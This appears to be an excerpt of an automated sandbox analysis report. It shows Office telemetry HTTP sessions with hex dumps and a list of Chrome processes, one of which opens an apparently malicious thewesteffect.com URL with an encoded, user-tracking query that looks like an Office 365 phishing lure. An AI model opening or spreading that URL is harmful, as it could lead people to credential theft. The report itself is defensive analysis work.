                                          2024-11-18 22:45:08 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          148192.168.2.45742713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:08 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:08 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:08 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1378
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                          ETag: "0x8DC582BDB813B3F"
                                          x-ms-request-id: 99e874a7-501e-00a0-6b09-379d9f000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224508Z-16547b76f7fkf5v9hC1DFW2y5s00000006dg0000000009a0
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:08 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          149192.168.2.45742813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:08 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:08 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:08 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1405
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                          ETag: "0x8DC582BE89A8F82"
                                          x-ms-request-id: 5e3aaffc-501e-0064-42f8-361f54000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224508Z-164f84587bffvwt9hC1DFW2ktw000000046000000000ffsq
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:08 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                          Click to jump to process

                                          Click to jump to process

                                          Click to jump to process

                                          Target ID:0
                                          Start time:17:43:44
                                          Start date:18/11/2024
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                          Imagebase:0x7ff76e190000
                                          File size:3'242'272 bytes
                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          Target ID:1
                                          Start time:17:43:48
                                          Start date:18/11/2024
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2280,i,3473752341378461948,12327758157782280307,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                          Imagebase:0x7ff76e190000
                                          File size:3'242'272 bytes
                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          Target ID:3
                                          Start time:17:43:51
                                          Start date:18/11/2024
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N"
                                          Imagebase:0x7ff76e190000
                                          File size:3'242'272 bytes
                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          No disassembly